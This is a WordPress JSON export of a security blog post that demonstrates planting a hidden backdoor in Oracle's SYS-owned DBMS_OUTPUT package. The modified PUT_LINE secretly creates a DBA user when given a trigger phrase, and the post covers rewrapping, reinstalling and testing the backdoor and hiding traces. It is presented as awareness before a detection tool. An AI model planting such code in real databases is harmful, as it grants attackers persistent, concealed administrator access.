{"id":3881,"date":"2018-12-05T08:50:14","date_gmt":"2018-12-05T10:50:14","guid":{"rendered":"https:\/\/www.dbarj.com.br\/?p=3881"},"modified":"2019-01-02T11:00:06","modified_gmt":"2019-01-02T13:00:06","slug":"injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects","status":"publish","type":"post","link":"https:\/\/www.dbarj.com.br\/en\/2018\/12\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\/","title":{"rendered":"Injecting a simple dbakit (or rootkit) in Oracle PL\/SQL objects"},"content":{"rendered":"

In this article, I will show how it is extremely simple to inject a hidden rootkit inside an Oracle database PL\/SQL object (like a procedure) making it very hard to detect for almost all DBA’s and Security Admins. It’s important to understand and know how those virus works so we can always be prepared to combat them.\u00a0Later in another article, I will also show how to detect and eliminate this type of\u00a0threat.<\/strong><\/span><\/p>\n

UPDATE: Article about orachksum tool is ready.<\/strong><\/span><\/a><\/p>\n

Virus\/malwares\/rootkits are simple peace of code that are driven to evil. As they are program instructions, they can run in anyplace that accept codes, and when we are talking about Oracle Database, first thing that comes in mind are PL\/SQL objects<\/strong>.<\/p>\n

Rootkit is a simple “kit” to become “root”.\u00a0 In the Oracle DB world, that would be a hidden kit to become “sys”, as this is the highest privilege within Oracle DB. More appropriate name here would be “syskit<\/strong>” or “dbakit<\/strong>“.<\/p>\n

So, if you’ve ever given DBA access to someone other than yourself, you have the chance to have a dbakit<\/strong><\/em> or another malicious code in your Oracle database. Can be an upset ex-employee, some temporarily\u00a0service provider guy that needed this privilege for a very short time, the mad developer who asked DBA access to build his application (and you granted it!) or even a hacker that explored some leak and left an open door behind, so he could come back one day.<\/p>\n

In other words, to inject the rootkit, the attacker must have had SYS privileges in some point of time. However, to use and explore it, he only needs CREATE SESSION, meaning that even if the current database administrator removes the privileged roles from him he can still become DBA.<\/span><\/p>\n

So, thinking like a hacker, to deploy a PL\/SQL level dbakit<\/em><\/strong>, he will follow 3 principles:<\/p>\n

    \n
  1. Inject in an object that is accessible to everyone.<\/strong><\/li>\n
  2. Inject in an object that is owned by some powerful user.<\/strong><\/li>\n
  3. Make it hard to be detected.<\/strong><\/li>\n<\/ol>\n

     <\/p>\n

    Let’s start.<\/h3>\n

    First here I’m playing with 12.2.0.1 – Oct 2018 PSU\/OJVM – Container Database – Oracle Linux 6.8<\/p>\n

    [oracle@localhost ~]$ sqlplus \/ as sysdba\r\n\r\nSQL*Plus: Release 12.2.0.1.0 Production on Tue Dec 4 11:21:06 2018\r\n\r\nCopyright (c) 1982, 2016, Oracle.  All rights reserved.\r\n\r\n\r\nConnected to:\r\nOracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production\r\n\r\nSQL> show pdbs\r\n\r\n    CON_ID CON_NAME                       OPEN MODE  RESTRICTED\r\n---------- ------------------------------ ---------- ----------\r\n         2 PDB$SEED                       READ ONLY  NO\r\n         3 PDB01                          READ WRITE NO<\/pre>\n
    Rule 1 basically means that the attacker will try to find an object that has EXECUTE<\/strong> privileges to PUBLIC<\/strong>, while rule 2 means that this object needs to be owner by some powerful account, like a DBA or SYS.<\/p>\n
    We can get a list of some of those objects with the query:<\/p>\n
    SQL> set lines 30 pages 100\r\nSQL> select distinct t1.object_name\r\n  2  from   dba_procedures t1, dba_tab_privs t2\r\n  3  where  t1.owner='SYS'\r\n  4  and    t1.authid='DEFINER'\r\n  5  and    t1.owner = t2.owner\r\n  6  and    t1.object_name = t2.table_name\r\n  7  and    t2.grantee='PUBLIC'\r\n  8  and    t2.privilege='EXECUTE'\r\n  9  and    t1.object_name like 'DBMS\\_%' escape '\\'\r\n 10  order by 1;\r\n\r\nOBJECT_NAME\r\n-----------------------------\r\nDBMS_APPLICATION_INFO\r\nDBMS_APP_CONT_PRVT\r\nDBMS_AUTO_TASK\r\nDBMS_CDC_ISUBSCRIBE\r\nDBMS_CDC_SUBSCRIBE\r\nDBMS_CRYPTO_TOOLKIT\r\nDBMS_CUBE_ADVISE_SEC\r\nDBMS_DEBUG\r\nDBMS_DESCRIBE\r\nDBMS_LDAP_UTL\r\nDBMS_LOB\r\nDBMS_LOBUTIL\r\nDBMS_LOGSTDBY_CONTEXT\r\nDBMS_NETWORK_ACL_UTILITY\r\nDBMS_OBFUSCATION_TOOLKIT\r\nDBMS_OUTPUT\r\nDBMS_PICKLER\r\nDBMS_RANDOM\r\nDBMS_RESULT_CACHE_API\r\nDBMS_ROWID\r\nDBMS_SNAPSHOT_UTL\r\nDBMS_STANDARD\r\nDBMS_TF\r\nDBMS_TRACE\r\nDBMS_UTILITY\r\nDBMS_XA_XID\r\nDBMS_XS_NSATTR\r\n\r\n27 rows selected.\r\n\r\nSQL><\/pre>\n
    So, all the packages above are owner by SYS and anyone with CREATE SESSION only can run them. They are also executed with SYS privileges, not the connect user. Let’s use\u00a0DBMS_OUTPUT<\/strong>, a very common one, for this exercise.<\/p>\n
    Getting its code…<\/p>\n
    SQL> set pages 0\r\nSQL> set long 100000\r\nSQL> select dbms_metadata.get_ddl('PACKAGE_BODY','DBMS_OUTPUT') from dual;\r\n\r\n  CREATE OR REPLACE NONEDITIONABLE PACKAGE BODY \"SYS\".\"DBMS_OUTPUT\" wrapped\r\na000000\r\n1\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nb\r\n10c4 5d8\r\nxj45EHIG5cl1aAF9cvrQRI+6G3Ewg0MreSAF3y8ZF7UY+Mm9LZmxHaeowB1QMzHz2Gk5oQ0I\r\nvATni377JegRt8sdkoa\/z5RsDNy6fk9gNi2iGdnHv3KQUwFtsrrvR9lDyz+dELVCtc7k0gg6\r\nvXV2UOFn\/4tE0a9kQpNvhVOq7TAd1StaR1r1hzszZbWy1hH\/WLTNx+K48OYMjq2A8cXIv6ER\r\nC7d0Wki6Js9CHVB5odntPIs8zvG0d\/SzGT\/Vlw1nPoTn9eKiAQ4KVW+oo23VGzNZ54VsFpCm\r\nFuqlp73tJC4\/QUG1wEHm\/5wwHU5MgA6OFPUxxxdE4ne9dwsY\/9EVNN0BbC\/fE\/2OdLZlpjRF\r\nSN6zuX2j4h2ic7w1aFEvY8gYGHZRhwYYXALCAQyCwK88sXSgqC3gmUaRf5sZfVesylTRUnJh\r\nBWYPfI2czyBHtQXIOb52R1KQxyWlzLc688gq5jx8Nab3lvjIAezdO517dtl+Wk0c1Y6nvq1b\r\nD1soJ3tr6ZWne1kWhTvlFKIN6NfALfom6eDhU6b8ORi0YPHV41X\/Xx9p6hEyUYclFOiCCkAC\r\nft6HFR70kxCXuVOuT87XClF96xsbrKETs5XL9IV1TjWBheozMV5Vl0So039jJvYtR2M+QPrA\r\nF7loiQjJD2ItZwKTfWbHL3KyJBRfMOCuCe3adoPNM1TjnvV0yNKhV+p5RvOJBK9t\/4yhEegZ\r\nJvUy5rJexLb2FeaaRPzybEePzXUrqHbgB3JC2+eDee\/j3KgUScfaQeEzmdM6G2jkefdQhqNM\r\n17anSnDxyQ2cFFKsF8ysCWa+E1OyZM2OM2OjZLyzKt9VAKw4PuV\/DZfSsZkwU7W4qQdqByRB\r\n+UbGlgeuvyjQqvc2z3N7TVuSpe75c3O2ehmTEbj4\/uvugs96z2X8atIWlDJfaxLJnHcP3xau\r\ncJaGJbgpPrOec5jme52pBcGY2qw8\/S6CZhDn5Wj2kjagJhl2g1cepezNP0c4TlefQ7v6oQp+\r\nCNW+kYcKk7l9zVZ1INdPudE87MbNCAmZdUGeOMfPF4qRliPS8ZqLQ4D9O5ioJ31IFL6wgiQT\r\nI7DrJuMhZ7eEtiuTJsiX81PQjBn1hmPV7TTDTK\/aQyP108bMXKx4f5Ur3BTZc9LLOuhUd0HM\r\nb5bee\/vvndGAZ1CjkLT7Rb2YTBqr6k7as+e7VVyHDpxYOkWUAb7w8s0TlRhESDynVV7DuavN\r\nGpaVg6HffXQ7b80XAiE6A45QGg7au1oPy83RTGRKvjiMk6VLLL6JPxszz9gjTY52QRh3sdsb\r\nBQt17SYNjEZ4VCDWFN6SP\/rO+GwqhORnJIc3yn8iuzDkO3Sbnvfi0VIFrgN1SQA\/IDicTvah\r\nnT\/s8sVlBYGcWIpzWmu90qpxc6n6459gjRqBEC5AE4emjwDXR+m4zCuOcV\/baDBuaTy8YMex\r\nrytkKIPVNMygE6Wg0OK1ukGDtSRzHbVrxqo=\r\n\r\n\r\nSQL><\/pre>\n
    The code is obfuscated, but it’s not hard do use some online options<\/a> to undo that.<\/p>\n
        1 PACKAGE BODY dbms_output AS\r\n    2 \r\n    3 \r\n    4 \r\n    5   ENABLED         BOOLEAN        := FALSE;\r\n    6   BUF_SIZE        BINARY_INTEGER;\r\n    7   LINEBUFLEN      BINARY_INTEGER := 0; \r\n    8   PUTIDX          BINARY_INTEGER := 1;\r\n    9   GETIDX          BINARY_INTEGER := 2;\r\n   10   GET_IN_PROGRESS BOOLEAN := TRUE;\r\n   11   TYPE            CHAR_ARR IS TABLE OF VARCHAR2(32767) INDEX BY BINARY_INTEGER;\r\n   12   BUF             CHAR_ARR;\r\n   13   BUFLEFT         BINARY_INTEGER := -1;\r\n   14 \r\n   15 \r\n   16 \r\n   17 \r\n   18 \r\n   19 \r\n   20 PROCEDURE KKXERAE(\r\n   21    NUM BINARY_INTEGER\r\n   22   ,MSG VARCHAR2\r\n   23   ,KEEPERRORSTACK BOOLEAN DEFAULT FALSE);\r\n   24 PRAGMA INTERFACE (C, KKXERAE);\r\n   25 \r\n   26 PROCEDURE RAISE_APPLICATION_ERROR(\r\n   27    NUM BINARY_INTEGER\r\n   28   ,MSG VARCHAR2\r\n   29   ,KEEPERRORSTACK BOOLEAN DEFAULT FALSE)\r\n   30 IS\r\n   31 BEGIN\r\n   32   KKXERAE(NUM, MSG, KEEPERRORSTACK);\r\n   33 END RAISE_APPLICATION_ERROR;\r\n   34 \r\n   35   \r\n   36   \r\n   37   \r\n   38   \r\n   39   \r\n   40   PROCEDURE ENABLE (BUFFER_SIZE IN INTEGER DEFAULT 20000) IS\r\n   41     LSTATUS INTEGER;\r\n   42     LOCKID  INTEGER;\r\n   43   BEGIN\r\n   44     ENABLED := TRUE;\r\n   45     IF BUFFER_SIZE < 2000 THEN\r\n   46       BUF_SIZE := 2000;\r\n   47     ELSIF BUFFER_SIZE > 1000000 THEN\r\n   48       BUF_SIZE := 1000000;\r\n   49     ELSIF BUFFER_SIZE IS NULL THEN\r\n   50       BUF_SIZE := -1;   \r\n   51     ELSE\r\n   52       BUF_SIZE := BUFFER_SIZE;\r\n   53     END IF;\r\n   54     BUFLEFT := BUF_SIZE;\r\n   55   END;\r\n   56 \r\n   57   PROCEDURE DISABLE IS\r\n   58   BEGIN\r\n   59     ENABLED := FALSE;\r\n   60 \r\n   61     BUF.DELETE;         \r\n   62     PUTIDX      := 1;\r\n   63     BUF(PUTIDX) := '';\r\n   64     GET_IN_PROGRESS := TRUE;\r\n   65   END;\r\n   66 \r\n   67   PROCEDURE PUT_INIT IS\r\n   68   BEGIN\r\n   69     BUF.DELETE;\r\n   70     PUTIDX := 1;\r\n   71     BUF(PUTIDX) := '';\r\n   72     LINEBUFLEN := 0;\r\n   73     BUFLEFT := BUF_SIZE;\r\n   74     GET_IN_PROGRESS := FALSE;\r\n   75   END;\r\n   76 \r\n   77   PROCEDURE PUT(A VARCHAR2) IS\r\n   78     STRLEN  BINARY_INTEGER;\r\n   79   BEGIN\r\n   80     IF ENABLED THEN\r\n   81       IF GET_IN_PROGRESS THEN\r\n   82         PUT_INIT;\r\n   83       END IF;\r\n   84 \r\n   85 \r\n   86 \r\n   87 \r\n   88       STRLEN := NVL(LENGTHB(A), 0);\r\n   89       IF ((STRLEN + LINEBUFLEN) > 32767) THEN\r\n   90         LINEBUFLEN := 0; BUF(PUTIDX) := '';\r\n   91         RAISE_APPLICATION_ERROR(-20000, 'ORU-10028: line length overflow, ' ||\r\n   92           'limit of 32767 bytes per line');\r\n   93       END IF;\r\n   94 \r\n   95       IF (BUF_SIZE <> -1) THEN   \r\n   96         IF (STRLEN > BUFLEFT) THEN\r\n   97             RAISE_APPLICATION_ERROR(-20000, 'ORU-10027: buffer overflow, ' ||\r\n   98               'limit of ' || TO_CHAR(BUF_SIZE) || ' bytes');\r\n   99         END IF;\r\n  100         BUFLEFT := BUFLEFT - STRLEN;\r\n  101       END IF;\r\n  102 \r\n  103       BUF(PUTIDX) := BUF(PUTIDX) || A;\r\n  104       LINEBUFLEN := LINEBUFLEN + STRLEN;\r\n  105 \r\n  106     END IF;\r\n  107   END;\r\n  108 \r\n  109   PROCEDURE PUT_LINE(A VARCHAR2) IS\r\n  110   BEGIN\r\n  111     IF ENABLED THEN\r\n  112       PUT(A);\r\n  113       NEW_LINE;\r\n  114     END IF;\r\n  115   END;\r\n  116 \r\n  117   PROCEDURE NEW_LINE IS\r\n  118   BEGIN\r\n  119     IF ENABLED THEN\r\n  120       IF GET_IN_PROGRESS THEN\r\n  121         PUT_INIT;\r\n  122       END IF;\r\n  123       LINEBUFLEN := 0;\r\n  124       PUTIDX := PUTIDX + 1;\r\n  125       BUF(PUTIDX) := '';\r\n  126     END IF;\r\n  127   END;\r\n  128 \r\n  129   PROCEDURE GET_LINE(LINE OUT VARCHAR2, STATUS OUT INTEGER) IS\r\n  130   BEGIN\r\n  131     IF NOT ENABLED THEN\r\n  132       STATUS := 1;\r\n  133       RETURN;\r\n  134     END IF;\r\n  135 \r\n  136     IF NOT GET_IN_PROGRESS THEN\r\n  137       \r\n  138       GET_IN_PROGRESS := TRUE;\r\n  139 \r\n  140       \r\n  141       \r\n  142       IF (LINEBUFLEN > 0) AND (PUTIDX = 1) THEN\r\n  143         STATUS := 1;\r\n  144         RETURN;\r\n  145       END IF;\r\n  146       \r\n  147       GETIDX := 1;\r\n  148     END IF;\r\n  149 \r\n  150     WHILE GETIDX < PUTIDX LOOP\r\n  151       LINE := BUF(GETIDX);\r\n  152       GETIDX := GETIDX + 1;\r\n  153       STATUS := 0;\r\n  154       RETURN;\r\n  155     END LOOP;\r\n  156     STATUS := 1;\r\n  157     RETURN;\r\n  158   END;\r\n  159 \r\n  160   PROCEDURE GET_LINES(LINES OUT CHARARR, NUMLINES IN OUT INTEGER) IS\r\n  161     LINECNT INTEGER := 1;\r\n  162     S       INTEGER;\r\n  163   BEGIN\r\n  164     IF NOT ENABLED THEN\r\n  165       NUMLINES := 0;\r\n  166       RETURN;\r\n  167     END IF;\r\n  168     WHILE LINECNT <= NUMLINES LOOP\r\n  169       GET_LINE(LINES(LINECNT), S);\r\n  170       IF S = 1 THEN                     \r\n  171         NUMLINES := LINECNT - 1;\r\n  172         RETURN;\r\n  173       END IF;\r\n  174       LINECNT := LINECNT + 1;           \r\n  175     END LOOP;\r\n  176     NUMLINES := LINECNT - 1;\r\n  177     RETURN;\r\n  178   END;\r\n  179 \r\n  180   PROCEDURE GET_LINES(LINES OUT DBMSOUTPUT_LINESARRAY, NUMLINES IN OUT INTEGER)\r\n  181   IS\r\n  182     LINECNT INTEGER := 1;\r\n  183     S       INTEGER;\r\n  184     N       INTEGER;\r\n  185   BEGIN\r\n  186     IF NOT ENABLED THEN\r\n  187       NUMLINES := 0;\r\n  188       RETURN;\r\n  189     END IF;\r\n  190 \r\n  191     LINES := DBMSOUTPUT_LINESARRAY();\r\n  192     LINES.DELETE;\r\n  193 \r\n  194     IF NUMLINES < BUF.COUNT THEN\r\n  195       N := NUMLINES;\r\n  196     ELSE\r\n  197       N := BUF.COUNT;\r\n  198     END IF;\r\n  199 \r\n  200     LINES.EXTEND(N);\r\n  201     WHILE LINECNT <= N LOOP\r\n  202       GET_LINE(LINES(LINECNT), S);\r\n  203       IF S = 1 THEN                     \r\n  204         NUMLINES := LINECNT - 1;\r\n  205         RETURN;\r\n  206       END IF;\r\n  207       LINECNT := LINECNT + 1;           \r\n  208     END LOOP;\r\n  209     NUMLINES := LINECNT - 1;\r\n  210     RETURN;\r\n  211   END;\r\n  212 \r\n  213 END;<\/pre>\n
    Now with the code clear to be read, an attacker could inject the dbakit<\/strong><\/em> on it. Let’s say he changes the\u00a0PUT_LINE<\/strong> function, one of the most common ones, and add something like that:<\/p>\n
      PROCEDURE PUT_LINE(A VARCHAR2) IS\r\n  BEGIN\r\n    IF ENABLED THEN\r\n      IF (a = 'shh! keep it secret!')\r\n      THEN\r\n        BEGIN\r\n          NEW_LINE;\r\n          execute immediate 'create user c##rj identified by oracle';\r\n          PUT('User c##rj created.');\r\n          NEW_LINE;\r\n        EXCEPTION WHEN OTHERS THEN NULL;\r\n        END;\r\n        BEGIN\r\n          NEW_LINE;\r\n          execute immediate 'grant dba to c##rj';\r\n          PUT('User c##rj granted DBA.');\r\n          NEW_LINE;\r\n        EXCEPTION WHEN OTHERS THEN NULL;\r\n        END;\r\n      END IF;\r\n      PUT(A);\r\n      NEW_LINE;\r\n    END IF;\r\n  END;<\/pre>\n
    What the code above will do is detect if someone is trying to spool the exact sentence “shh! keep it secret!<\/strong>” and if so, it will create a CDB account named c##rj<\/strong> and grant DBA to it. Off course that the attacker doesn’t want any error printed on screen if it fails, so an EXCEPTION block goes there to deal with it.<\/p>\n
    The dbakit<\/strong><\/em> is ready. Now, next step is to inject it back to the database, but he will probably wrap it again before:<\/p>\n
    [oracle@localhost ~]$ wrap iname=dbms_output_mod.sql \r\n\r\nPL\/SQL Wrapper: Release 12.2.0.1.0- 64bit Production on Tue Dec 04 13:28:57 2018\r\n\r\nCopyright (c) 1993, 2009, Oracle.  All rights reserved.\r\n\r\nProcessing dbms_output_mod.sql to dbms_output_mod.plb\r\n[oracle@localhost ~]$ cat dbms_output_mod.plb\r\nCREATE PACKAGE BODY \"SYS\".\"DBMS_OUTPUT\" wrapped \r\na000000\r\n1\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nabcd\r\nb\r\n12a3 6a7\r\n9KQrttwzNgyjF4mRkR5nhXBDf1cwg0NUea4FWi+8cuQY3vioYefjwCVSFY7eC66sAguA9phG\r\n+NMI4PK5V03mg+uhcwh4+PwNC7Cgv3P1b+EXv4dBWELJn2pfAsF+rHyXUQwwpPDoOmbVbZOT\r\nNDmnu1AdqT79bAQ3QmCTp8oM18aGv3zJoUr79EqXCGbQqoTVq7BfD9EGoN29wKj32z7xw6ze\r\nnEZ8ny+m+vOsV+wd9brTwCACvr0\/LoppbbOD4NQDvcZ6xKhQP68Mve1TbqhXrjDUzqxSy1LL\r\nAlqmkQswclNUJNI\/InqSQ4UHV\/C4y4zZSmc+Wn3CsP7Tdh+6abvM9fyoR6hgbIBXJE\/vF333\r\n+1rZ3gxtKwfrz+CoGHLB44JdeoZCNQFhzIBXyQEJTcI6+75wtz4dOOPQk+OPAoSG8GGk526V\r\nrdG0fqfbqNUGVkxaTrUqGpBXmojuFNyhaqIuiwdnPOeTajb72yH8hG\/n4cQ\/\/LiOA6+MI1\/3\r\n1YvUPnV7BGkHW9JpLcfzGxRdYRbHuCcubZMwHF5tUzZQ+3eyXUvwFMaPRQD3hw5XhGOG0vHK\r\nf80+Klmbp4s+NADIrk\/CGbnrST+wAfHS3ra2Negu\/OAHRgtZ+A4j2wuBSE3iXdgv9IUldw3j\r\nBnFvhMm+gr8jlwQD+PMbVHBwmFpIU8dqdL0+uSakD9jLOSe+AG9u4XnhFBDTSm3f5lsYbY8K\r\n\/5ChFrAZYfUy5g1exLYKxn6ak\/yLRJzWxAujMbjjpBvBy+8RDfDdMUQTbmdkBJ5NttsILlPr\r\n\/vSAZLcGfl1\/qudbP2kSCHpiUx4UhUnxHvQFpYPcOA\/llet4RTORvyg4yAjA0KNDpbELMFQi\r\nK6VpAD9UmmrrwScy\/qXSH6HdnJbagWcsela1ceLuKdw11h6dsT2Cz9grCRCPIBpRSrOfcvo+\r\ngZyely+0hX0hbqvyoOa16MhKSu6S61WkNR7w6Ij3tEZmuueSVKC8VHZNVx6l7M28+jg6RbDZ\r\nmre3KzFo0F3xiDvJvpCumDzP9vn1vy1QaH7QH6CmPvMmQbu7D68sXIHzFpNyPdflo52rzqPl\r\nzBqDGiMJNMj\/HReywQSnRNftKY6MdbMFqVaHO9XO0llEmEJOyYHaViAKxoGbSJNVCZLu3jIy\r\nTmmycdVR7lsBOw5ZaLmYMvyb0E4vF6x7uKhXdfPP4qO6HJ7wZlu13+IoCgrGKmiHD6+Soe5o\r\nq9aOsOOM8\/ioUiFC1YDogSXSS\/BpYJuVFJLirYMAuyd9ktuzIJiLfSkAz2HpFKaXb\/c4s8T7\r\nBT6EUL8sLU2u0OK5oQNR1TA7cU9fIRVLFkKD212jMfFWc7D+dCAYrS6KkQiJyyxwXerB44P4\r\nefZQn6lIFUgfJtQ9NDkhFZhXbbYhZUnoSKGn124JE5NN21Z49tmS1z6\/8DMOlpUVoUvriKNi\r\ng3IYcYuuzGfIrLwldJVVDzslzUK3\/cXsfA0eStlodkIAv\/ccxZMHBWYqKsz63wTcGT2D3BX9\r\n2Oo18SFMrsD+I\/GZQHVOI04tNlIIiMYSlgHIzLj16fQFP+yVaPwIupnV+SgO+bIOYU2FisKd\r\nR5G7Ep4uDqq4gWIbPoOIjcGxsQhoh11ipoYpohlOatgaj3EUm+YKAqwzxBrDv0slHtZh0E6s\r\nK+13u4wetaewBv6utaZbX9\/C\r\n\r\n\/\r\n[oracle@localhost ~]$<\/pre>\n
    Changing the first line to CREATE OR REPLACE NONEDITIONABLE PACKAGE BODY “SYS”.”DBMS_OUTPUT” wrapped<\/span><\/strong><\/span>
    \nand injecting it back to the database:<\/p>\n
    SQL> @dbms_output_mod.plb\r\n\r\nPackage body created.\r\n\r\nSQL> show errors\r\nNo errors.\r\nSQL><\/pre>\n
    And now testing the dbakit<\/strong><\/em>:<\/p>\n
    SQL> select username from dba_users where username='C##RJ';\r\n\r\nno rows selected\r\n\r\nSQL> set serverout on\r\nSQL> exec dbms_output.enable;\r\n\r\nPL\/SQL procedure successfully completed.\r\n\r\nSQL> exec dbms_output.put_line('Hello');\r\nHello\r\n\r\nPL\/SQL procedure successfully completed.\r\n\r\nSQL> exec dbms_output.put_line('Bye');\r\nBye\r\n\r\nPL\/SQL procedure successfully completed.\r\n\r\nSQL> exec dbms_output.put_line('shh! keep it secret!');\r\nUser c##rj created.\r\nUser c##rj granted DBA.\r\nshh! keep it secret!\r\n\r\nPL\/SQL procedure successfully completed.\r\n\r\nSQL> select username from dba_users where username='C##RJ';\r\n\r\nUSERNAME\r\n--------------------------------------------------------------------------------\r\nC##RJ\r\n\r\nSQL> conn c##rj\/oracle\r\nConnected.<\/pre>\n
    The dbakit<\/strong><\/em> is ready. Now the only thing a user needs to do to get a DBA access if he has only the CREATE SESSION privilege is execute:\u00a0exec dbms_output.put_line(‘shh! keep it secret!’);<\/strong><\/em><\/p>\n
    Just to make it harder to detect, the attacker will probably revert back the modification timestamp of the package body change in obj$, clean audit logs and apply some other tricks to clean his traces.<\/p>\n
    In next article I will talk about the orachksum<\/span> utility and how to use it to detect any modified oracle code inside your database.<\/strong><\/p>\n
    UPDATE: Article about orachksum tool is ready.<\/strong><\/span><\/a><\/p>\nHave you enjoyed? Please leave a comment or give a \ud83d\udc4d!<\/b>\n
    Continue reading<\/a><\/p>\n","protected":false},"author":1,"featured_media":3899,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[20],"tags":[],"class_list":["post-3881","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-security-en","item-wrap"],"yoast_head":"\nInjecting a simple dbakit (or rootkit) in Oracle PL\/SQL objects - DBA - Rodrigo Jorge - Oracle Tips and Guides<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.dbarj.com.br\/en\/2018\/12\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\/\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"DBA RJ\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"11 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/2018\\\/12\\\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/2018\\\/12\\\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\\\/\"},\"author\":{\"name\":\"DBA RJ\",\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/#\\\/schema\\\/person\\\/28a44ca3a6633fe4156ad1ea209d40a9\"},\"headline\":\"Injecting a simple dbakit (or rootkit) in Oracle PL\\\/SQL objects\",\"datePublished\":\"2018-12-05T10:50:14+00:00\",\"dateModified\":\"2019-01-02T13:00:06+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/2018\\\/12\\\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\\\/\"},\"wordCount\":742,\"commentCount\":2,\"publisher\":{\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/#\\\/schema\\\/person\\\/28a44ca3a6633fe4156ad1ea209d40a9\"},\"image\":{\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/2018\\\/12\\\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.dbarj.com.br\\\/wp-content\\\/uploads\\\/2018\\\/12\\\/seguranca_hacker_ciber.jpg\",\"articleSection\":[\"Database Security\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/2018\\\/12\\\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/2018\\\/12\\\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\\\/\",\"url\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/2018\\\/12\\\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\\\/\",\"name\":\"Injecting a simple dbakit (or rootkit) in Oracle PL\\\/SQL objects - DBA - Rodrigo Jorge - Oracle Tips and Guides\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/2018\\\/12\\\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/2018\\\/12\\\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.dbarj.com.br\\\/wp-content\\\/uploads\\\/2018\\\/12\\\/seguranca_hacker_ciber.jpg\",\"datePublished\":\"2018-12-05T10:50:14+00:00\",\"dateModified\":\"2019-01-02T13:00:06+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/2018\\\/12\\\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/2018\\\/12\\\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/2018\\\/12\\\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.dbarj.com.br\\\/wp-content\\\/uploads\\\/2018\\\/12\\\/seguranca_hacker_ciber.jpg\",\"contentUrl\":\"https:\\\/\\\/www.dbarj.com.br\\\/wp-content\\\/uploads\\\/2018\\\/12\\\/seguranca_hacker_ciber.jpg\",\"width\":625,\"height\":469},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/2018\\\/12\\\/injecting-a-simple-dbakit-or-rootkit-in-oracle-pl-sql-objects\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Injecting a simple dbakit (or rootkit) in Oracle PL\\\/SQL objects\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/#website\",\"url\":\"https:\\\/\\\/www.dbarj.com.br\\\/en\\\/\",\"name\":\"DBA - Rodrigo Jorge - Oracle Tips and Guides\",\"description\":\"Blog about Databases, Security and High 